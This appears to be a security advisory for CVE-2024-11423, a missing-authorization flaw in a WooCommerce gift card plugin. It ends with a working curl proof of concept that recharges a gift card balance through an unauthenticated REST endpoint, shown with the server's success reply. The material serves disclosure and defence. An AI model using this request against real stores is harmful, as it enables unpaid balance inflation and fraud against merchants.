# CVE-2024-11423
Ultimate Gift Cards for WooCommerce <= 3.0.6 - Missing Authorization to Infinite Money Glitch

# Description

The Ultimate Gift Cards for WooCommerce – Create WooCommerce Gift Cards, Gift Vouchers, Redeem & Manage Digital Gift Coupons. Offer Gift Certificates, Schedule Gift Cards, and Use Advance Coupons With Personalized Templates plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on several REST API endpoints such as /wp-json/gifting/recharge-giftcard in all versions up to, and including, 3.0.6. This makes it possible for unauthenticated attackers to recharge a gift card balance, without making a payment along with reducing gift card balances without purchasing anything.

## Details

- **Type**: plugin
- **Slug**: woo-gift-cards-lite
- **Affected Version**: 3.0.6
- **CVSS Score**: 7.5
- **CVSS Rating**: High
- **CVSS Vector**: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
- **CVE**: CVE-2024-11423
- **Status**: Active

POC
---
```
curl -X POST \
  https://wp-dev.ddev.site/wp-json/gifting/recharge-giftcard \
  -H 'Content-Type: application/json' \
  -d '{"coupon_code": "CUQP4C9M", "recharge_amount": "100.00", "coupon_expiry": "2027-12-31", "usage_limit": "511"}'


{"code":"success","message":"Coupon is successfully Recharged","data":{"status":200,"remaining_amount":120,"discount_type":"fixed_cart","usage_count":0,"usage_limit":"511","description":"","coupon_expiry":"2027-12-31"}}

```
